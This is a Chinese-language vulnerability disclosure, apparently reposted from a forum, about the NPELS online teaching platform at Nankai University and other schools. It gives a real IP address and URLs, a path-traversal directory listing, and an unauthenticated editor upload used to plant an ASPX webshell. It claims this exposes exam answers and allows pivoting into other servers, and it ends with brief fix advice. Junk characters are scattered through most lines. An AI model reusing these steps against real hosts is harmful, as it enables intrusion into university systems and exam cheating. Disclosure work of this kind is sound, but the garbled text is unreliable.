好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
8 W, ^5 }4 l) h% D7 E5 i1 k2 y& o/ y- z
详细说明:( a6 [' c; `+ D- N, Z9 G
# q! X; A3 P S$ v, D8 p) f2 S
以南开大学的为例: 2 h7 }/ t& i1 U
http://222.30.60.3/NPELS
0 L9 N6 }7 r8 ^8 jNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址/ [0 v0 j2 m$ l5 k
<setting name="Update_CommonSvr_CommonService" serializeAs="String">' j/ Y: [( o8 i* H+ M" p
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>+ i) I, |4 R0 ^) M4 o) C; K
</setting>
- O& E/ k* g* l及版本号
: [! a# a; m6 D0 W" D5 d<add key="TVersion" value="1, 0, 0, 2187">7 c) T9 {- n1 h- |$ d9 X$ y; s
</add>8 ?0 M4 T& N* b" {( r% b7 g
直接访问1 H6 c" Y2 u; D* U& W
http://222.30.60.3/NPELS/CommonService.asmx9 ^5 e/ h9 m% _- w7 T
使用GetTestClientFileList操作,直接 HTTP GET 列目录:. ]# x' c, i( c- ^
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 21870 ]: {' z0 u8 n' F/ \5 X6 w
进一步列目录(返回的网页很大,可以直接 wget 下来)& ]7 @) P$ x* T I: l
http://222.30.60.3/NPELS/CommonS ... List?version=../../
! G9 h) e; X1 K8 h7 b : y3 F# D% ]* G$ x
发现
! y1 R$ Q2 |& E, Z/ P" xhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm5 P M! g Q7 |9 Z+ J6 W
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头) K, a- `) ^3 r6 t- g" y# ]' s: d
上传后继续列目录找到木马地址直接访问即可- C1 B% p, T) c% K! z1 k
- ?5 g3 p& p9 n& HOOXX8 J5 X( [! _1 m2 X
! A& b/ o! W) Y/ i+ n W2 P3 ^Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
9 F' b) d" b) N0 s" h( q# f漏洞证明:
, t' T4 X) R3 L( `! ` , f$ G3 L; |/ j$ ?
列目录:2 Z0 R' h$ i% q! K( K# v4 [
http://222.30.60.3/NPELS/CommonS ... List?version=../../
^0 N) R8 n+ y. H9 B# \文件上传:0 s, s' W; ]; g8 r* v
http://222.30.60.3/npelsv/editor/editor.htm0 c5 ]6 D5 R) a: U5 D5 z( Q
' R2 _0 P* G4 w6 W D/ |( z% _
上传木马:
+ j M* }# B- g+ Zhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx/ X/ t) M5 ?# z7 g4 \( t; C
% ^& I% ?& a" H& a' @: J2 a) {0 c
修复方案:
6 v; O. Q5 P5 o3 y9 }* {3 ^好像考试系统必须使用 CommonService.asmx
i0 `+ v2 b; W! e最好配置文件加密或者用别的方式不让它泄露出来 z5 Q3 s$ B3 }! b V
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
& L! {% e/ R7 {. n1 g! r3 x0 G7 ] |